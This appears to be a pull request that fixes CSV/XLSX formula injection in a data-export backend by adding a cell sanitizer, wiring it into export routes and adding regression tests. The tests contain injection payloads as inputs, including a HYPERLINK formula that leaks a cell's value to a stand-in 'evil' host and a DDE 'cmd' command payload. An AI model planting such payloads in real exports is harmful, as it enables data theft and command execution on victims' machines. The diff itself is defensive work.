### PR TITLE
Fix CSV/XLSX formula injection in data & metadata exports (SW-1306)

### DIFF
--- a/src/controllers/admin.ts
+++ b/src/controllers/admin.ts
@@ -18,6 +18,7 @@ import { UserCreateDTO } from '../dtos/user/user-create-dto';
 import { QueryFailedError } from 'typeorm';
 import { BadRequestException } from '../exceptions/bad-request.exception';
 import { GlobalRole } from '../enums/global-role';
+import { neutralizeCsvRecord } from '../utils/csv-sanitizer';
 import { RoleSelectionDTO } from '../dtos/user/role-selection-dto';
 import { UserStatus } from '../enums/user-status';
 import { UserGroupStatus } from '../enums/user-group-status';
@@ -355,7 +356,14 @@ export const similarDatasets = async (req: Request, res: Response, next: NextFun
     }
 
     res.setHeader('Content-Type', 'text/csv');
-    stringify(csv, { bom: true, header: true, quoted_string: true }).pipe(res);
+    stringify(
+      csv.map((row) => neutralizeCsvRecord(row as Record<string, unknown>)),
+      {
+        bom: true,
+        header: true,
+        quoted_string: true
+      }
+    ).pipe(res);
   } catch (err) {
     logger.error(err, 'Error getting similar datasets');
     next(new UnknownException());
@@ -377,7 +385,10 @@ export const downloadSearchLogs = async (req: Request, res: Response, next: Next
     }));
 
     res.setHeader('Content-Type', 'text/csv');
-    stringify(csv, { bom: true, header: true, quoted_string: true }).pipe(res);
+    stringify(
+      csv.map((row) => neutralizeCsvRecord(row)),
+      { bom: true, header: true, quoted_string: true }
+    ).pipe(res);
   } catch (err) {
     logger.error(err, 'Error getting search logs');
     next(new UnknownException());

--- a/src/controllers/translation.ts
+++ b/src/controllers/translation.ts
@@ -16,6 +16,7 @@ import { DatasetRepository, withMetadataForTranslation } from '../repositories/d
 import { TempFile } from '../interfaces/temp-file';
 import { uploadAvScan } from '../services/virus-scanner';
 import { createAllCubeFiles } from '../services/cube-builder';
+import { neutralizeCsvRecord } from '../utils/csv-sanitizer';
 
 // imported translation filename can be constant as we overwrite each time it's imported
 const TRANSLATION_FILENAME = 'translation-import.csv';
@@ -65,7 +66,10 @@ export const translationExport = async (req: Request, res: Response, next: NextF
     });
 
     res.setHeader('Content-Type', 'text/csv');
-    stringify(translations, { bom: true, header: true, quoted_string: true }).pipe(res);
+    stringify(
+      translations.map((row) => neutralizeCsvRecord(row as unknown as Record<string, unknown>)),
+      { bom: true, header: true, quoted_string: true }
+    ).pipe(res);
   } catch (error) {
     logger.error(error, 'Error exporting translations');
     next(new UnknownException());

--- a/src/services/consumer-view-v2.ts
+++ b/src/services/consumer-view-v2.ts
@@ -120,7 +120,7 @@ export async function sendExcel(query: string, queryStore: QueryStore, res: Resp
       }
 
       const data = Object.values(row).map((val) => {
-        if (!val) return null;
+        if (val === null || val === undefined || val === '') return null;
         return isNaN(Number(val)) ? neutralizeCsvCell(val) : Number(val);
       });
       worksheet.addRow(data).commit();

--- a/src/services/consumer-view-v2.ts
+++ b/src/services/consumer-view-v2.ts
@@ -1,5 +1,6 @@
 import { Response } from 'express';
 import { pipeline } from 'node:stream/promises';
+import { Transform } from 'node:stream';
 import { escape } from 'lodash';
 import { PoolClient } from 'pg';
 import QueryStream from 'pg-query-stream';
@@ -34,9 +35,19 @@ import {
 } from '../utils/cursor-codec';
 import { KeysetSortColumn, buildKeysetWhere } from './keyset-where-builder';
 import { resolveDefaultSort } from './default-sort-resolver';
+import { neutralizeCsvCell, neutralizeCsvRecord, neutralizeCsvRow } from '../utils/csv-sanitizer';
 
 const EXCEL_ROW_LIMIT = 1048576 - 76; // Excel Limit is 1,048,576 but removed 76 rows because ?
 const HIGH_WATER_MARK = 500; // max rows to buffer in memory at once when streaming from the database
+
+function csvSanitizeTransform(): Transform {
+  return new Transform({
+    objectMode: true,
+    transform(row, _enc, callback): void {
+      callback(null, neutralizeCsvRecord(row as Record<string, unknown>));
+    }
+  });
+}
 
 export async function sendCsv(query: string, queryStore: QueryStore, res: Response): Promise<void> {
   logger.debug(`Sending CSV for query id ${queryStore.id}...`);
@@ -54,7 +65,7 @@ export async function sendCsv(query: string, queryStore: QueryStore, res: Respon
     res.setHeader('Content-Type', 'text/csv');
     res.setHeader('Content-Disposition', `attachment;filename=${queryStore.datasetId}.csv`);
 
-    await pipeline(dbStream, csvStream, res, { end: false });
+    await pipeline(dbStream, csvSanitizeTransform(), csvStream, res, { end: false });
 
     await cubeDBConn.query('COMMIT');
     if (!hasData) {
@@ -104,13 +115,13 @@ export async function sendExcel(query: string, queryStore: QueryStore, res: Resp
 
       // Add headers from first row
       if (isFirstRow) {
-        worksheet.addRow(Object.keys(row));
+        worksheet.addRow(neutralizeCsvRow(Object.keys(row)));
         isFirstRow = false;
       }
 
       const data = Object.values(row).map((val) => {
         if (!val) return null;
-        return isNaN(Number(val)) ? val : Number(val);
+        return isNaN(Number(val)) ? neutralizeCsvCell(val) : Number(val);
       });
       worksheet.addRow(data).commit();
 

--- a/src/services/consumer-view.ts
+++ b/src/services/consumer-view.ts
@@ -425,10 +425,9 @@ export const createStreamingCSVFilteredView = async (
       const stream = csvFormat({ delimiter: ',', headers: true });
       stream.pipe(res);
       while (rows.length > 0) {
-        // eslint-disable-next-line @typescript-eslint/no-explicit-any
-        rows.map((row: any) => {
+        for (const row of rows) {
           stream.write(neutralizeCsvRecord(row));
-        });
+        }
         rows = await cursor.read(CURSOR_ROW_LIMIT);
       }
     } else {
@@ -502,7 +501,7 @@ export const createStreamingExcelFilteredView = async (
         for (const row of rows) {
           if (row === null) break;
           const data = Object.values(row).map((val) => {
-            if (!val) return null;
+            if (val === null || val === undefined || val === '') return null;
             return isNaN(Number(val)) ? neutralizeCsvCell(val) : Number(val);
           });
           worksheet.addRow(Object.values(data)).commit();

--- a/src/services/consumer-view.ts
+++ b/src/services/consumer-view.ts
@@ -504,7 +504,7 @@ export const createStreamingExcelFilteredView = async (
             if (val === null || val === undefined || val === '') return null;
             return isNaN(Number(val)) ? neutralizeCsvCell(val) : Number(val);
           });
-          worksheet.addRow(Object.values(data)).commit();
+          worksheet.addRow(data).commit();
         }
         totalRows += CURSOR_ROW_LIMIT;
         if (totalRows > EXCEL_ROW_LIMIT) {

--- a/src/services/consumer-view.ts
+++ b/src/services/consumer-view.ts
@@ -22,6 +22,7 @@ import { FactTableToDimensionName } from '../interfaces/fact-table-column-to-dim
 import { coreViewChooser, dateColumnsFromDimensions, sortFilterRows, transformHierarchy } from '../utils/consumer';
 import { FilterRow } from '../interfaces/filter-row';
 import { Dimension } from '../entities/dataset/dimension';
+import { neutralizeCsvCell, neutralizeCsvRecord, neutralizeCsvRow } from '../utils/csv-sanitizer';
 
 // Caller-supplied dataset loader: lets the publisher path go through DatasetRepository (publisher pool,
 // supports drafts) and the consumer path through PublishedDatasetRepository (consumer pool,
@@ -426,7 +427,7 @@ export const createStreamingCSVFilteredView = async (
       while (rows.length > 0) {
         // eslint-disable-next-line @typescript-eslint/no-explicit-any
         rows.map((row: any) => {
-          stream.write(row);
+          stream.write(neutralizeCsvRecord(row));
         });
         rows = await cursor.read(CURSOR_ROW_LIMIT);
       }
@@ -496,13 +497,13 @@ export const createStreamingExcelFilteredView = async (
     let totalRows = 0;
     let worksheet = workbook.addWorksheet(`Sheet-${sheetCount}`);
     if (rows.length > 0) {
-      worksheet.addRow(Object.keys(rows[0]));
+      worksheet.addRow(neutralizeCsvRow(Object.keys(rows[0])));
       while (rows.length > 0) {
         for (const row of rows) {
           if (row === null) break;
           const data = Object.values(row).map((val) => {
             if (!val) return null;
-            return isNaN(Number(val)) ? val : Number(val);
+            return isNaN(Number(val)) ? neutralizeCsvCell(val) : Number(val);
           });
           worksheet.addRow(Object.values(data)).commit();
         }

--- a/src/services/pivots.ts
+++ b/src/services/pivots.ts
@@ -22,6 +22,7 @@ import { FilterRow } from '../interfaces/filter-row';
 import { UnknownException } from '../exceptions/unknown.exception';
 import { makeCubeSafeString } from './cube-builder';
 import { DimensionType, LookupTableTypes } from '../enums/dimension-type';
+import { neutralizeCsvCell, neutralizeCsvRow } from '../utils/csv-sanitizer';
 
 const EXCEL_ROW_LIMIT = 1048576 - 76; // Excel Limit is 1,048,576 but removed 76 rows because ?
 
@@ -236,12 +237,12 @@ async function pivotToCsv(
     // eslint-disable-next-line @typescript-eslint/naming-convention
     'Content-disposition': `attachment;filename=pivot-${Date.now()}.csv`
   });
-  const stream = csvFormat({ delimiter: ',', headers: columnOrder });
+  const stream = csvFormat({ delimiter: ',', headers: neutralizeCsvRow(columnOrder) as string[] });
   stream.pipe(res);
 
   for await (const rows of pivot.yieldRows()) {
     for (const row of rows) {
-      const reorderedRow = reorderRow(row, columnMapping);
+      const reorderedRow = neutralizeCsvRow(reorderRow(row, columnMapping));
       stream.write(reorderedRow);
     }
   }
@@ -272,14 +273,14 @@ async function pivotToExcel(
   let totalRows = 0;
   let worksheet = workbook.addWorksheet(`Sheet-${sheetCount}`);
 
-  worksheet.addRow(columnOrder);
+  worksheet.addRow(neutralizeCsvRow(columnOrder));
   for await (const rows of pivot.yieldRows()) {
     for (const row of rows) {
       if (row === null) break;
       const data = columnMapping.map((srcIdx) => {
         const val = row[srcIdx];
         if (val === null || val === undefined || val === '') return null;
-        return isNaN(Number(val)) ? val : Number(val);
+        return isNaN(Number(val)) ? neutralizeCsvCell(val) : Number(val);
       });
       worksheet.addRow(data).commit();
     }

--- a/src/utils/csv-sanitizer.ts
+++ b/src/utils/csv-sanitizer.ts
@@ -5,7 +5,7 @@
 // into the string "'-5" just because "-" is a dangerous leading character for strings.
 export const neutralizeCsvCell = (value: unknown): unknown => {
   if (typeof value !== 'string') return value;
-  return /^[=+\-@\t\r]/.test(value) ? `'${value}` : value;
+  return /^[=+\-@\t\r\n]/.test(value) ? `'${value}` : value;
 };
 
 // Neutralizes every value in a positional row/array — CSV/XLSX data rows or header arrays.

--- a/src/utils/csv-sanitizer.ts
+++ b/src/utils/csv-sanitizer.ts
@@ -1,0 +1,22 @@
+// Neutralizes CSV/XLSX formula injection (CWE-1236). String values beginning with a character
+// that Excel/LibreOffice/Sheets treats as a formula prefix are given a leading apostrophe so they
+// are opened as inert text instead of being evaluated. Non-string values (numbers, booleans,
+// dates, null/undefined) are left untouched — e.g. a genuine negative number must not be turned
+// into the string "'-5" just because "-" is a dangerous leading character for strings.
+export const neutralizeCsvCell = (value: unknown): unknown => {
+  if (typeof value !== 'string') return value;
+  return /^[=+\-@\t\r]/.test(value) ? `'${value}` : value;
+};
+
+// Neutralizes every value in a positional row/array — CSV/XLSX data rows or header arrays.
+export const neutralizeCsvRow = (row: unknown[]): unknown[] => row.map((value) => neutralizeCsvCell(value));
+
+// Neutralizes every key and value of a plain record. Use this wherever the record's own keys
+// become the header row (e.g. csv-stringify/fast-csv with header/headers: true).
+export const neutralizeCsvRecord = (record: Record<string, unknown>): Record<string, unknown> => {
+  const sanitized: Record<string, unknown> = {};
+  for (const [key, value] of Object.entries(record)) {
+    sanitized[neutralizeCsvCell(key) as string] = neutralizeCsvCell(value);
+  }
+  return sanitized;
+};

--- a/src/utils/csv-sanitizer.ts
+++ b/src/utils/csv-sanitizer.ts
@@ -3,20 +3,26 @@
 // are opened as inert text instead of being evaluated. Non-string values (numbers, booleans,
 // dates, null/undefined) are left untouched — e.g. a genuine negative number must not be turned
 // into the string "'-5" just because "-" is a dangerous leading character for strings.
-export const neutralizeCsvCell = (value: unknown): unknown => {
+export function neutralizeCsvCell(value: string): string;
+export function neutralizeCsvCell<T>(value: T): T;
+export function neutralizeCsvCell(value: unknown): unknown {
   if (typeof value !== 'string') return value;
   return /^[=+\-@\t\r\n]/.test(value) ? `'${value}` : value;
-};
+}
 
 // Neutralizes every value in a positional row/array — CSV/XLSX data rows or header arrays.
-export const neutralizeCsvRow = (row: unknown[]): unknown[] => row.map((value) => neutralizeCsvCell(value));
+export function neutralizeCsvRow(row: string[]): string[];
+export function neutralizeCsvRow<T>(row: T[]): T[];
+export function neutralizeCsvRow(row: unknown[]): unknown[] {
+  return row.map((value) => neutralizeCsvCell(value));
+}
 
 // Neutralizes every key and value of a plain record. Use this wherever the record's own keys
 // become the header row (e.g. csv-stringify/fast-csv with header/headers: true).
 export const neutralizeCsvRecord = (record: Record<string, unknown>): Record<string, unknown> => {
   const sanitized: Record<string, unknown> = {};
   for (const [key, value] of Object.entries(record)) {
-    sanitized[neutralizeCsvCell(key) as string] = neutralizeCsvCell(value);
+    sanitized[neutralizeCsvCell(key)] = neutralizeCsvCell(value);
   }
   return sanitized;
 };

--- a/test/unit/controllers/admin.test.ts
+++ b/test/unit/controllers/admin.test.ts
@@ -632,6 +632,18 @@ describe('Admin controller', () => {
 
       expect(mockNext.mock.calls[0][0]).toBeInstanceOf(UnknownException);
     });
+
+    it('neutralizes formula-injection payloads in dataset titles (SW-1306 regression)', async () => {
+      datasetStatsRepo.similarTitles.mockResolvedValue([
+        { title_1: '=HYPERLINK("https://evil/")', title_2: 'Safe title', similarity_score: 0.5 }
+      ]);
+
+      const res = createMockResponse();
+      await similarDatasets(createMockRequest({ query: { by: DatasetSimilarBy.Title } as never }), res, mockNext);
+
+      const [rows] = mockStringify.mock.calls[0] as [Record<string, unknown>[]];
+      expect(rows[0]).toMatchObject({ title_1: `'=HYPERLINK("https://evil/")`, title_2: 'Safe title' });
+    });
   });
 
   describe('downloadSearchLogs', () => {
@@ -650,6 +662,22 @@ describe('Admin controller', () => {
       expect(searchLogRepo.getByPeriod).toHaveBeenCalled();
       expect(res.setHeader).toHaveBeenCalledWith('Content-Type', 'text/csv');
       expect(mockStringifyStream.pipe).toHaveBeenCalledWith(res);
+    });
+
+    it('neutralizes formula-injection payloads in search keywords (SW-1306 regression)', async () => {
+      searchLogRepo.getByPeriod.mockResolvedValue([
+        { createdAt: new Date('2026-01-01T00:00:00Z'), mode: 'simple', keywords: '=cmd|" /C calc"!A0', resultCount: 1 }
+      ]);
+
+      const res = createMockResponse();
+      await downloadSearchLogs(
+        createMockRequest({ query: { start: '2026-01-01', end: '2026-02-01' } as never }),
+        res,
+        mockNext
+      );
+
+      const [rows] = mockStringify.mock.calls[0] as [Record<string, unknown>[]];
+      expect(rows[0]).toMatchObject({ keywords: `'=cmd|" /C calc"!A0` });
     });
 
     it('passes UnknownException to next on error', async () => {

--- a/test/unit/controllers/translation.test.ts
+++ b/test/unit/controllers/translation.test.ts
@@ -160,6 +160,23 @@ describe('Translation controller', () => {
       expect(mockNext).toHaveBeenCalledTimes(1);
       expect(mockNext.mock.calls[0][0]).toBeInstanceOf(UnknownException);
     });
+
+    it('neutralizes formula-injection payloads in translation values (SW-1306 regression)', async () => {
+      const revisionId = uuidV4();
+      const dataset = { id: uuidV4(), draftRevision: { id: revisionId } };
+      const translations = [
+        { type: 'metadata', key: 'title', english: '=HYPERLINK("https://evil/")', cymraeg: 'Diogel' }
+      ];
+      mockGetById.mockResolvedValue(dataset);
+      mockCollectTranslations.mockReturnValue(translations);
+
+      const req = createMockRequest();
+      const res = createMockResponse();
+      await translationExport(req, res, mockNext);
+
+      const [rows] = mockStringify.mock.calls[0] as [Record<string, unknown>[]];
+      expect(rows[0]).toMatchObject({ english: `'=HYPERLINK("https://evil/")`, cymraeg: 'Diogel' });
+    });
   });
 
   describe('validateImport', () => {

--- a/test/unit/services/consumer-view-v2.test.ts
+++ b/test/unit/services/consumer-view-v2.test.ts
@@ -2,6 +2,7 @@
 
 import { Readable, PassThrough } from 'node:stream';
 import { Response } from 'express';
+import ExcelJS from 'exceljs';
 
 // Mock logger before other imports
 jest.mock('../../../src/utils/logger', () => ({
@@ -145,6 +146,27 @@ function createMockStreamResponse(): Response & { writtenData: string[]; written
   return res;
 }
 
+// Helper to create a mock Response that captures binary data (for Excel tests)
+function createMockBinaryResponse(): Response & { getBuffer: () => Promise<Buffer> } {
+  const stream = new PassThrough();
+  const chunks: Buffer[] = [];
+  stream.on('data', (chunk) => chunks.push(Buffer.isBuffer(chunk) ? chunk : Buffer.from(chunk)));
+
+  const res = stream as unknown as Response & { getBuffer: () => Promise<Buffer> };
+  res.setHeader = jest.fn().mockReturnThis();
+  res.flushHeaders = jest.fn();
+  res.status = jest.fn().mockReturnThis();
+  res.json = jest.fn();
+  (res as any).headersSent = false;
+  res.getBuffer = () =>
+    new Promise<Buffer>((resolve) => {
+      stream.on('end', () => resolve(Buffer.concat(chunks)));
+      if (stream.readableEnded) resolve(Buffer.concat(chunks));
+    });
+
+  return res;
+}
+
 // Helper to create a mock readable stream that emits rows asynchronously
 function createMockDbStream(rows: Record<string, unknown>[]): Readable {
   let index = 0;
@@ -231,6 +253,23 @@ describe('consumer-view-v2 service', () => {
       expect(output).toContain('value1');
     });
 
+    it('neutralizes formula-injection payloads in headers and cell values (SW-1306 regression)', async () => {
+      const rows = [{ '=HYPERLINK("https://evil/")': '=1+1', col2: '+SUM(A1:A2)' }];
+      const mockStream = createMockDbStream(rows);
+      const mockPoolClient = createMockPoolClient(mockStream);
+      mockObtainMasterConnection.mockResolvedValue([mockPoolClient]);
+
+      const queryStore = createMockQueryStore();
+      const res = createMockStreamResponse();
+
+      await sendCsv('SELECT * FROM test', queryStore, res);
+
+      const output = res.writtenData.join('');
+      expect(output).toContain(`'=HYPERLINK(""https://evil/"")`); // CSV-escaped quotes around the neutralized header
+      expect(output).toContain(`'=1+1`);
+      expect(output).toContain(`'+SUM(A1:A2)`);
+    });
+
     it('should write newline for empty result set', async () => {
       const mockStream = createMockDbStream([]);
       const mockPoolClient = createMockPoolClient(mockStream);
@@ -307,6 +346,31 @@ describe('consumer-view-v2 service', () => {
 
       expect(res.flushHeaders).toHaveBeenCalled();
       expect(mockRelease).toHaveBeenCalled();
+    });
+
+    it('neutralizes formula-injection payloads in headers and cell values (SW-1306 regression)', async () => {
+      const rows = [{ '=HYPERLINK("https://evil/")': '-2+3+cmd|" /C calc"!A0', col2: 100 }];
+      const mockStream = createMockDbStream(rows);
+      const mockPoolClient = createMockPoolClient(mockStream);
+      mockObtainMasterConnection.mockResolvedValue([mockPoolClient]);
+
+      const queryStore = createMockQueryStore();
+      const res = createMockBinaryResponse();
+
+      await sendExcel('SELECT * FROM test', queryStore, res);
+
+      const buffer = await res.getBuffer();
+      const workbook = new ExcelJS.Workbook();
+      // @ts-expect-error ExcelJS types expect old Buffer, Node 24 returns Buffer<ArrayBuffer>
+      await workbook.xlsx.load(buffer);
+
+      const worksheet = workbook.getWorksheet(1)!;
+      const headerRow = worksheet.getRow(1);
+      const dataRow = worksheet.getRow(2);
+
+      expect(headerRow.getCell(1).value).toBe(`'=HYPERLINK("https://evil/")`);
+      expect(dataRow.getCell(1).value).toBe(`'-2+3+cmd|" /C calc"!A0`);
+      expect(dataRow.getCell(2).value).toBe(100);
     });
 
     it('should release connection on error', async () => {

--- a/test/unit/services/consumer-view.test.ts
+++ b/test/unit/services/consumer-view.test.ts
@@ -1,0 +1,166 @@
+/* eslint-disable @typescript-eslint/naming-convention */
+
+import { PassThrough } from 'node:stream';
+import { Response } from 'express';
+import ExcelJS from 'exceljs';
+
+jest.mock('../../../src/utils/logger', () => ({
+  logger: {
+    debug: jest.fn(),
+    info: jest.fn(),
+    error: jest.fn(),
+    warn: jest.fn(),
+    trace: jest.fn()
+  }
+}));
+
+jest.mock('i18next', () => ({
+  t: jest.fn((key: string) => key)
+}));
+
+// preview-validator.ts (pulled in transitively by consumer-view.ts) imports the real i18next
+// middleware, which calls .use()/.init() at module load time — stub it out entirely.
+jest.mock('../../../src/middleware/translation', () => ({
+  i18next: { t: jest.fn((key: string) => key) },
+  SUPPORTED_LOCALES: ['en-GB', 'cy-GB'],
+  AVAILABLE_LANGUAGES: ['en', 'cy'],
+  t: jest.fn((key: string) => key)
+}));
+
+// Mock database manager: the pool client (for BEGIN/COMMIT/filter query/cursor) and the
+// createQueryRunner()-based path used by the file's private getColumns().
+const mockPoolQuery = jest.fn();
+const mockPoolRelease = jest.fn();
+const mockQueryRunnerQuery = jest.fn();
+const mockQueryRunnerRelease = jest.fn();
+jest.mock('../../../src/db/database-manager', () => ({
+  dbManager: {
+    getCubeDataSource: () => ({
+      createQueryRunner: () => ({
+        query: (...args: unknown[]) => mockQueryRunnerQuery(...args),
+        release: (...args: unknown[]) => mockQueryRunnerRelease(...args)
+      }),
+      driver: {
+        obtainMasterConnection: () =>
+          Promise.resolve([{ query: (...args: unknown[]) => mockPoolQuery(...args), release: mockPoolRelease }])
+      }
+    })
+  }
+}));
+
+// coreViewChooser hits the DB internally — stub it directly rather than mocking its collaborators.
+jest.mock('../../../src/utils/consumer', () => ({
+  coreViewChooser: jest.fn().mockResolvedValue('core_view_en'),
+  dateColumnsFromDimensions: jest.fn().mockReturnValue(new Set()),
+  sortFilterRows: jest.fn((rows) => rows),
+  transformHierarchy: jest.fn()
+}));
+
+// pg-cursor issues real protocol-level queries against a Client; stub it so cubeDBConn.query()
+// can recognise cursor instances and return a controllable `.read()`.
+const mockCursorRead = jest.fn();
+jest.mock('pg-cursor', () => jest.fn().mockImplementation((query: string) => ({ __isCursor: true, query })));
+
+import { createStreamingCSVFilteredView, createStreamingExcelFilteredView } from '../../../src/services/consumer-view';
+
+function setupDbMocks(rows: Record<string, unknown>[]): void {
+  mockQueryRunnerQuery.mockResolvedValue([]); // no column-order metadata -> defaults to SELECT *
+  mockPoolQuery.mockImplementation((arg: unknown) => {
+    if (arg === 'BEGIN' || arg === 'COMMIT' || arg === 'ROLLBACK') return Promise.resolve();
+    if (arg && typeof arg === 'object' && (arg as { __isCursor?: boolean }).__isCursor) {
+      let served = false;
+      return {
+        read: mockCursorRead.mockImplementation(() => {
+          if (served) return Promise.resolve([]);
+          served = true;
+          return Promise.resolve(rows);
+        })
+      };
+    }
+    // filter_table lookup for column/dimension names
+    return Promise.resolve({ rows: [] });
+  });
+}
+
+function createMockStreamResponse(): Response & { writtenData: string[] } {
+  const writtenData: string[] = [];
+  const stream = new PassThrough();
+  const originalWrite = stream.write.bind(stream);
+  stream.write = ((chunk: any, encodingOrCallback?: any, callback?: any) => {
+    if (chunk) writtenData.push(typeof chunk === 'string' ? chunk : chunk.toString());
+    if (typeof encodingOrCallback === 'function') return originalWrite(chunk, encodingOrCallback);
+    return originalWrite(chunk, encodingOrCallback, callback);
+  }) as typeof stream.write;
+
+  const res = stream as unknown as Response & { writtenData: string[] };
+  res.writtenData = writtenData;
+  res.setHeader = jest.fn().mockReturnThis();
+  res.writeHead = jest.fn().mockReturnThis();
+  res.flushHeaders = jest.fn();
+  res.status = jest.fn().mockReturnThis();
+  (res as any).headersSent = false;
+  return res;
+}
+
+function createMockBinaryResponse(): Response & { getBuffer: () => Promise<Buffer> } {
+  const stream = new PassThrough();
+  const chunks: Buffer[] = [];
+  stream.on('data', (chunk) => chunks.push(Buffer.isBuffer(chunk) ? chunk : Buffer.from(chunk)));
+
+  const res = stream as unknown as Response & { getBuffer: () => Promise<Buffer> };
+  res.setHeader = jest.fn().mockReturnThis();
+  res.writeHead = jest.fn().mockReturnThis();
+  res.flushHeaders = jest.fn();
+  res.status = jest.fn().mockReturnThis();
+  (res as any).headersSent = false;
+  res.getBuffer = () =>
+    new Promise<Buffer>((resolve) => {
+      stream.on('end', () => resolve(Buffer.concat(chunks)));
+      if (stream.readableEnded) resolve(Buffer.concat(chunks));
+    });
+  return res;
+}
+
+describe('consumer-view (v1) service', () => {
+  beforeEach(() => {
+    jest.clearAllMocks();
+    mockPoolRelease.mockResolvedValue(undefined);
+    mockQueryRunnerRelease.mockResolvedValue(undefined);
+  });
+
+  describe('createStreamingCSVFilteredView', () => {
+    it('neutralizes formula-injection payloads in headers and cell values (SW-1306 regression)', async () => {
+      setupDbMocks([{ '=HYPERLINK("https://evil/")': '=1+1', Area: '+SUM(A1:A2)' }]);
+      const res = createMockStreamResponse();
+
+      await createStreamingCSVFilteredView(res, 'test-revision-id', 'en-GB');
+
+      const output = res.writtenData.join('');
+      expect(output).toContain(`'=HYPERLINK(""https://evil/"")`);
+      expect(output).toContain(`'=1+1`);
+      expect(output).toContain(`'+SUM(A1:A2)`);
+    });
+  });
+
+  describe('createStreamingExcelFilteredView', () => {
+    it('neutralizes formula-injection payloads in headers and cell values (SW-1306 regression)', async () => {
+      setupDbMocks([{ '=HYPERLINK("https://evil/")': '-2+3+cmd|" /C calc"!A0', Area: 100 }]);
+      const res = createMockBinaryResponse();
+
+      await createStreamingExcelFilteredView(res, 'test-revision-id', 'en-GB');
+
+      const buffer = await res.getBuffer();
+      const workbook = new ExcelJS.Workbook();
+      // @ts-expect-error ExcelJS types expect old Buffer, Node 24 returns Buffer<ArrayBuffer>
+      await workbook.xlsx.load(buffer);
+
+      const worksheet = workbook.getWorksheet(1)!;
+      const headerRow = worksheet.getRow(1);
+      const dataRow = worksheet.getRow(2);
+
+      expect(headerRow.getCell(1).value).toBe(`'=HYPERLINK("https://evil/")`);
+      expect(dataRow.getCell(1).value).toBe(`'-2+3+cmd|" /C calc"!A0`);
+      expect(dataRow.getCell(2).value).toBe(100);
+    });
+  });
+});

--- a/test/unit/services/pivots.test.ts
+++ b/test/unit/services/pivots.test.ts
@@ -571,6 +571,28 @@ describe('pivots service', () => {
         expect(lines[0]).toBe('Area,2020,2021');
         expect(lines[1]).toBe('Cardiff,100,200');
       });
+
+      it('neutralizes formula-injection payloads in headers and cell values (SW-1306 regression)', async () => {
+        const columns = ['Area', '=HYPERLINK("https://evil/")'];
+        const rows: DuckDBValue[][] = [['=1+1', '+SUM(A1:A2)']];
+        setupMockDuckDB(columns, rows);
+
+        const res = createMockStreamResponse();
+        const queryStore = createMockQueryStore();
+        const pageOptions = defaultPageOptions({ format: OutputFormats.Csv });
+
+        mockGetFilterTable.mockResolvedValue([]);
+        mockResolveDimensionToFactTableColumn.mockReturnValue('period_col');
+        mockGetById.mockResolvedValue({ dimensions: [] });
+
+        await createPivotOutputUsingDuckDB(res, 'en', 'PIVOT (...)', pageOptions, queryStore);
+
+        const output = res.writtenData.join('');
+        const lines = output.trim().split('\n');
+
+        expect(lines[0]).toBe('Area,"\'=HYPERLINK(""https://evil/"")"');
+        expect(lines[1]).toBe(`'=1+1,'+SUM(A1:A2)`);
+      });
     });
 
     describe('HTML output', () => {
@@ -676,6 +698,35 @@ describe('pivots service', () => {
         expect(dataRow.getCell(1).value).toBe('Cardiff');
         expect(dataRow.getCell(2).value).toBeNull(); // blank cell
         expect(dataRow.getCell(3).value).toBe(200);
+      });
+
+      it('neutralizes formula-injection payloads in headers and cell values (SW-1306 regression)', async () => {
+        const columns = ['Area', '=HYPERLINK("https://evil/")'];
+        const rows: DuckDBValue[][] = [['-2+3+cmd|" /C calc"!A0', 100]];
+        setupMockDuckDB(columns, rows);
+
+        const res = createMockBinaryResponse();
+        const queryStore = createMockQueryStore();
+        const pageOptions = defaultPageOptions({ format: OutputFormats.Excel });
+
+        mockGetFilterTable.mockResolvedValue([]);
+        mockResolveDimensionToFactTableColumn.mockReturnValue('period_col');
+        mockGetById.mockResolvedValue({ dimensions: [] });
+
+        await createPivotOutputUsingDuckDB(res, 'en', 'PIVOT (...)', pageOptions, queryStore);
+
+        const buffer = await res.getBuffer();
+        const workbook = new ExcelJS.Workbook();
+        // @ts-expect-error ExcelJS types expect old Buffer, Node 24 returns Buffer<ArrayBuffer>
+        await workbook.xlsx.load(buffer);
+
+        const worksheet = workbook.getWorksheet(1)!;
+        const headerRow = worksheet.getRow(1);
+        const dataRow = worksheet.getRow(2);
+
+        expect(headerRow.getCell(2).value).toBe(`'=HYPERLINK("https://evil/")`);
+        expect(dataRow.getCell(1).value).toBe(`'-2+3+cmd|" /C calc"!A0`);
+        expect(dataRow.getCell(2).value).toBe(100);
       });
     });
 

--- a/test/unit/utils/csv-sanitizer.test.ts
+++ b/test/unit/utils/csv-sanitizer.test.ts
@@ -1,0 +1,78 @@
+/* eslint-disable @typescript-eslint/naming-convention */
+
+import { neutralizeCsvCell, neutralizeCsvRecord, neutralizeCsvRow } from '../../../src/utils/csv-sanitizer';
+
+describe('neutralizeCsvCell', () => {
+  it.each(['=', '+', '-', '@', '\t', '\r'])('prefixes a value starting with %j with an apostrophe', (prefix) => {
+    const value = `${prefix}HYPERLINK("https://evil/","report")`;
+    expect(neutralizeCsvCell(value)).toBe(`'${value}`);
+  });
+
+  it('neutralizes a leading-equals formula payload from the ticket example', () => {
+    expect(neutralizeCsvCell('=HYPERLINK("https://evil/?="&A1,"report")')).toBe(
+      `'=HYPERLINK("https://evil/?="&A1,"report")`
+    );
+  });
+
+  it('leaves an ordinary string unchanged', () => {
+    expect(neutralizeCsvCell('Cardiff')).toBe('Cardiff');
+  });
+
+  it('leaves a string with an internal but non-leading dangerous character unchanged', () => {
+    expect(neutralizeCsvCell('Total = 100')).toBe('Total = 100');
+  });
+
+  it('leaves a number unchanged (and does not coerce it to a string)', () => {
+    expect(neutralizeCsvCell(100)).toBe(100);
+  });
+
+  it('leaves a negative number unchanged', () => {
+    expect(neutralizeCsvCell(-5)).toBe(-5);
+  });
+
+  it('leaves null unchanged', () => {
+    expect(neutralizeCsvCell(null)).toBeNull();
+  });
+
+  it('leaves undefined unchanged', () => {
+    expect(neutralizeCsvCell(undefined)).toBeUndefined();
+  });
+
+  it('leaves a boolean unchanged', () => {
+    expect(neutralizeCsvCell(true)).toBe(true);
+  });
+});
+
+describe('neutralizeCsvRow', () => {
+  it('neutralizes only the dangerous entries in a positional row', () => {
+    const row = ['Cardiff', '=1+1', 100, '@SUM(A1:A2)'];
+    expect(neutralizeCsvRow(row)).toEqual(['Cardiff', "'=1+1", 100, "'@SUM(A1:A2)"]);
+  });
+
+  it('returns an empty array unchanged', () => {
+    expect(neutralizeCsvRow([])).toEqual([]);
+  });
+});
+
+describe('neutralizeCsvRecord', () => {
+  it('neutralizes dangerous values but leaves safe keys and numeric values unchanged', () => {
